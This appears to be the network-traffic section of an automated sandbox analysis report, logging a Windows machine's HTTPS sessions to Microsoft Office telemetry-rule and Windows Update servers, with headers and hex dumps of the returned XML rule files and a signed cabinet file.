                                                                                                                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="224902" V="2" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120100" /> <UTS T="2" Id="bbr5q" /> <SS T="3" G="{a36a970d-45a9-4e0d-9cab-2a235cc9d7c6}" /> </S> <C T="G" I="0" O="falseN


                                                                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                            6192.168.2.44973713.107.246.45443
                                                                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                            2024-11-21 11:09:59 UTC193OUTGET /rules/rule120402v21s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                            2024-11-21 11:10:00 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                            Date: Thu, 21 Nov 2024 11:10:00 GMT
                                                                                                                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                                                                                                                            Content-Length: 3788
                                                                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:17 GMT
                                                                                                                                                                                                                                                                                                            ETag: "0x8DC582BAC2126A6"
                                                                                                                                                                                                                                                                                                            x-ms-request-id: 1c744767-001e-0082-6060-3b5880000000
                                                                                                                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                            x-azure-ref: 20241121T111000Z-178bfbc474bw8bwphC1NYC38b4000000017g0000000077mk
                                                                                                                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                            2024-11-21 11:10:00 UTC3788INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 34 30 32 22 20 56 3d 22 32 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 2e 53 79 73 74 65 6d 48 65 61 6c 74 68 55 6e 67 72 61 63 65 66 75 6c 41 70 70 45 78 69 74 44 65 73 6b 74 6f 70 22 20 41 54 54 3d 22 63 64 38 33 36 36 32 36 36 31 31 63 34 63 61 61 61 38 66 63 35 62 32 65 37 32 38 65 65 38 31 64 2d 33 62 36 64 36 63 34 35 2d 36 33 37 37 2d 34 62 66 35 2d 39 37 39 32 2d 64 62 66 38 65 31 38 38 31 30 38 38 2d 37 35 32 31 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 43 65 6e 73 75 73 22 20 44 4c 3d 22 41 22 20 44 43 61 3d 22 50 53 50 22 20 78 6d 6c 6e 73 3d 22 22
                                                                                                                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120402" V="21" DC="SM" EN="Office.System.SystemHealthUngracefulAppExitDesktop" ATT="cd836626611c4caaa8fc5b2e728ee81d-3b6d6c45-6377-4bf5-9792-dbf8e1881088-7521" SP="CriticalCensus" DL="A" DCa="PSP" xmlns=""


                                                                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                            7192.168.2.4497424.175.87.197443
                                                                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                            2024-11-21 11:10:00 UTC306OUTGET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=gGycNp42KykxeBF&MD=kGXnbV+K HTTP/1.1
                                                                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                                                                                                                                            User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33
                                                                                                                                                                                                                                                                                                            Host: slscr.update.microsoft.com
                                                                                                                                                                                                                                                                                                            2024-11-21 11:10:00 UTC560INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                                                                                                                                                            Content-Type: application/octet-stream
                                                                                                                                                                                                                                                                                                            Expires: -1
                                                                                                                                                                                                                                                                                                            Last-Modified: Mon, 01 Jan 0001 00:00:00 GMT
                                                                                                                                                                                                                                                                                                            ETag: "vic+p1MiJJ+/WMnK08jaWnCBGDfvkGRzPk9f8ZadQHg=_1440"
                                                                                                                                                                                                                                                                                                            MS-CorrelationId: 1ea9e1b5-3a44-48cb-b808-ab0f71f1cb08
                                                                                                                                                                                                                                                                                                            MS-RequestId: bae046fb-f80e-436b-bf9c-5af8e69579ed
                                                                                                                                                                                                                                                                                                            MS-CV: iadDmCr0EkOBQI3G.0
                                                                                                                                                                                                                                                                                                            X-Microsoft-SLSClientCache: 1440
                                                                                                                                                                                                                                                                                                            Content-Disposition: attachment; filename=environment.cab
                                                                                                                                                                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                            Date: Thu, 21 Nov 2024 11:09:59 GMT
                                                                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                                                                            Content-Length: 30005
                                                                                                                                                                                                                                                                                                            2024-11-21 11:10:00 UTC15824INData Raw: 4d 53 43 46 00 00 00 00 8d 2b 00 00 00 00 00 00 44 00 00 00 00 00 00 00 03 01 01 00 01 00 04 00 5b 49 00 00 14 00 00 00 00 00 10 00 8d 2b 00 00 a8 49 00 00 00 00 00 00 00 00 00 00 64 00 00 00 01 00 01 00 72 4d 00 00 00 00 00 00 00 00 00 00 00 00 80 00 65 6e 76 69 72 6f 6e 6d 65 6e 74 2e 63 61 62 00 fe f6 51 be 21 2b 72 4d 43 4b ed 7c 05 58 54 eb da f6 14 43 49 37 0a 02 d2 b9 86 0e 41 52 a4 1b 24 a5 bb 43 24 44 18 94 90 92 52 41 3a 05 09 95 ee 54 b0 00 91 2e e9 12 10 04 11 c9 6f 10 b7 a2 67 9f bd cf 3e ff b7 ff b3 bf 73 ed e1 9a 99 f5 c6 7a d7 bb de f5 3e cf fd 3c f7 dc 17 4a 1a 52 e7 41 a8 97 1e 14 f4 e5 25 7d f4 05 82 82 c1 20 30 08 06 ba c3 05 02 11 7f a9 c1 ff d2 87 5c 1e f4 ed 65 8e 7a 1f f6 0a 40 03 1d 7b f9 83 2c 1c 2f db b8 3a 39 3a 58 38 ba 73 5e
                                                                                                                                                                                                                                                                                                            Data Ascii: MSCF+D[I+IdrMenvironment.cabQ!+rMCK|XTCI7AR$C$DRA:T.og>sz><JRA%} 0\ez@{,/:9:X8s^
                                                                                                                                                                                                                                                                                                            2024-11-21 11:10:00 UTC14181INData Raw: 06 03 55 04 06 13 02 55 53 31 13 30 11 06 03 55 04 08 13 0a 57 61 73 68 69 6e 67 74 6f 6e 31 10 30 0e 06 03 55 04 07 13 07 52 65 64 6d 6f 6e 64 31 1e 30 1c 06 03 55 04 0a 13 15 4d 69 63 72 6f 73 6f 66 74 20 43 6f 72 70 6f 72 61 74 69 6f 6e 31 26 30 24 06 03 55 04 03 13 1d 4d 69 63 72 6f 73 6f 66 74 20 54 69 6d 65 2d 53 74 61 6d 70 20 50 43 41 20 32 30 31 30 30 1e 17 0d 32 33 31 30 31 32 31 39 30 37 32 35 5a 17 0d 32 35 30 31 31 30 31 39 30 37 32 35 5a 30 81 d2 31 0b 30 09 06 03 55 04 06 13 02 55 53 31 13 30 11 06 03 55 04 08 13 0a 57 61 73 68 69 6e 67 74 6f 6e 31 10 30 0e 06 03 55 04 07 13 07 52 65 64 6d 6f 6e 64 31 1e 30 1c 06 03 55 04 0a 13 15 4d 69 63 72 6f 73 6f 66 74 20 43 6f 72 70 6f 72 61 74 69 6f 6e 31 2d 30 2b 06 03 55 04 0b 13 24 4d 69 63 72 6f
                                                                                                                                                                                                                                                                                                            Data Ascii: UUS10UWashington10URedmond10UMicrosoft Corporation1&0$UMicrosoft Time-Stamp PCA 20100231012190725Z250110190725Z010UUS10UWashington10URedmond10UMicrosoft Corporation1-0+U$Micro


                                                                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                            8192.168.2.44974313.107.246.45443
                                                                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                            2024-11-21 11:10:02 UTC192OUTGET /rules/rule120610v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                            2024-11-21 11:10:02 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                            Date: Thu, 21 Nov 2024 11:10:02 GMT
                                                                                                                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                                                                                                                            Content-Length: 474
                                                                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:25:46 GMT
                                                                                                                                                                                                                                                                                                            ETag: "0x8DC582B9964B277"
                                                                                                                                                                                                                                                                                                            x-ms-request-id: 02a2c6fa-b01e-0001-107b-3b46e2000000
                                                                                                                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                            x-azure-ref: 20241121T111002Z-178bfbc474bh5zbqhC1NYCkdug000000017g00000000dzag
                                                                                                                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                            2024-11-21 11:10:02 UTC474INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 30 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120610" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120609" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                            9192.168.2.44974413.107.246.45443
                                                                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                            2024-11-21 11:10:02 UTC192OUTGET /rules/rule120611v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                            2024-11-21 11:10:02 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                            Date: Thu, 21 Nov 2024 11:10:02 GMT
                                                                                                                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                                                                                                                            Content-Length: 415
                                                                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:25:56 GMT
                                                                                                                                                                                                                                                                                                            ETag: "0x8DC582B9F6F3512"
                                                                                                                                                                                                                                                                                                            x-ms-request-id: 30601852-401e-0047-7476-3b8597000000
                                                                                                                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                            x-azure-ref: 20241121T111002Z-1777c6cb754gvvgfhC1TEBz4rg0000000ayg00000000hk8s
                                                                                                                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                            2024-11-21 11:10:02 UTC415INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 30 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4c 6c 5d 5b 45 65 5d 5b 4e 6e 5d 5b 4f 6f 5d 5b 56 76 5d 5b 4f 6f 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75
                                                                                                                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120611" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120609" /> <SR T="2" R="([Ll][Ee][Nn][Oo][Vv][Oo])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tru


                                                                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                            10192.168.2.44974513.107.246.45443
                                                                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                            2024-11-21 11:10:02 UTC192OUTGET /rules/rule120612v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                            2024-11-21 11:10:02 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                            Date: Thu, 21 Nov 2024 11:10:02 GMT
                                                                                                                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                                                                                                                            Content-Length: 471
                                                                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:25 GMT
                                                                                                                                                                                                                                                                                                            ETag: "0x8DC582BB10C598B"
                                                                                                                                                                                                                                                                                                            x-ms-request-id: 17c3c293-501e-00a3-6567-3bc0f2000000
                                                                                                                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                            x-azure-ref: 20241121T111002Z-178bfbc474bbbqrhhC1NYCvw7400000001dg00000000fnpd
                                                                                                                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                            2024-11-21 11:10:02 UTC471INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120612" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120611" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                            11192.168.2.44974713.107.246.45443
                                                                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                            2024-11-21 11:10:02 UTC192OUTGET /rules/rule120613v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                            2024-11-21 11:10:02 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                            Date: Thu, 21 Nov 2024 11:10:02 GMT
                                                                                                                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                                                                                                                            Content-Length: 632
                                                                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:35 GMT
                                                                                                                                                                                                                                                                                                            ETag: "0x8DC582BB6E3779E"
                                                                                                                                                                                                                                                                                                            x-ms-request-id: d8e3f512-601e-003d-2af7-3a6f25000000
                                                                                                                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                            x-azure-ref: 20241121T111002Z-r1d97b995777mdbwhC1TEBezag0000000a80000000008076
                                                                                                                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                            2024-11-21 11:10:02 UTC632INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 48 68 5d 5b 50 70 5d 28 5b 5e 45 5d 7c 24 29 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 33 22 20 52 3d 22 28 5b 48 68 5d 5b 45 65 5d 5b 57 77 5d 5b 4c 6c 5d 5b 45 65 5d
                                                                                                                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120613" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120611" /> <SR T="2" R="^([Hh][Pp]([^E]|$))"> <S T="1" F="1" M="Ignore" /> </SR> <SR T="3" R="([Hh][Ee][Ww][Ll][Ee]


                                                                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                            12192.168.2.44974613.107.246.45443
                                                                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                            2024-11-21 11:10:02 UTC192OUTGET /rules/rule120614v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                            2024-11-21 11:10:02 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                            Date: Thu, 21 Nov 2024 11:10:02 GMT
                                                                                                                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                                                                                                                            Content-Length: 467
                                                                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:08 GMT
                                                                                                                                                                                                                                                                                                            ETag: "0x8DC582BA6C038BC"
                                                                                                                                                                                                                                                                                                            x-ms-request-id: 7f65a9a1-801e-0067-788c-3afe30000000
                                                                                                                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                            x-azure-ref: 20241121T111002Z-178bfbc474bq2pr7hC1NYCkfgg00000001dg00000000dxnn
                                                                                                                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                            2024-11-21 11:10:02 UTC467INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120614" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120613" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                            13192.168.2.44974813.107.246.45443
                                                                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                            2024-11-21 11:10:04 UTC192OUTGET /rules/rule120615v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                            2024-11-21 11:10:04 UTC491INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                            Date: Thu, 21 Nov 2024 11:10:04 GMT
                                                                                                                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                                                                                                                            Content-Length: 407
                                                                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:42 GMT
                                                                                                                                                                                                                                                                                                            ETag: "0x8DC582BBAD04B7B"
                                                                                                                                                                                                                                                                                                            x-ms-request-id: 561f43d7-f01e-0096-2f75-3b10ef000000
                                                                                                                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                            x-azure-ref: 20241121T111004Z-1777c6cb754xjpthhC1TEBexs80000000arg00000000g3cc
                                                                                                                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                            X-Cache-Info: L1_T2
                                                                                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                            2024-11-21 11:10:04 UTC407INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 41 61 5d 5b 53 73 5d 5b 55 75 5d 5b 53 73 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20
                                                                                                                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120615" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120613" /> <SR T="2" R="([Aa][Ss][Uu][Ss])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">


                                                                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                            14192.168.2.44974913.107.246.45443
                                                                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                            2024-11-21 11:10:04 UTC192OUTGET /rules/rule120616v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
